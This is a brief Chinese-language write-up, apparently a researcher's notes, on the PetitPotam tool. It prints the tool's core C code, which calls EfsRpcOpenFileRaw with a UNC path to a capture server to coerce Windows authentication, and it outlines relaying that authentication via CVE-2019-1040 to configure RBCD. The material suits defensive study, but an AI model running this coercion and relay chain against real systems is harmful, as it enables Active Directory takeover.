https://github.com/topotam/PetitPotam
收到GitHub推送看到了一个新工具可以触发Windows主机认证请求,
通过MS-EFSRPC协议的EfsRpcOpenFileRaw
函数
查看源代码:
int wmain(int argc, wchar_t** argv, wchar_t** envp) { wprintf(L"Usage: PetitPotam.exe <captureServerIP> <targetServerIP> \n"); handle_t ht = Bind(argv[2]); HRESULT hr = NULL; PEXIMPORT_CONTEXT_HANDLE plop; SecureZeroMemory((char*)&(plop), sizeof(plop)); wchar_t buffer[100]; swprintf(buffer, 100, L"\\\\%s\\test\\topotam.exe", argv[1]); long flag = 0; hr = EfsRpcOpenFileRaw(ht, &plop, buffer, flag); if (hr == ERROR_BAD_NETPATH) { wprintf(L"Attack success!!!\n"); } return 0; }
第四行向目标机器RPC进行认证返回句柄,然后构造参数后直接调用EfsRpcOpenFileRaw
这个API
老样子,认证还是SMB,是带签名的可以配合CVE-2019-1040进行relay操作,而且在我测试2008printbug用不了的主机通过此工具也可以成功触发请求
然后中继机器收到请求
成功配置了RBCD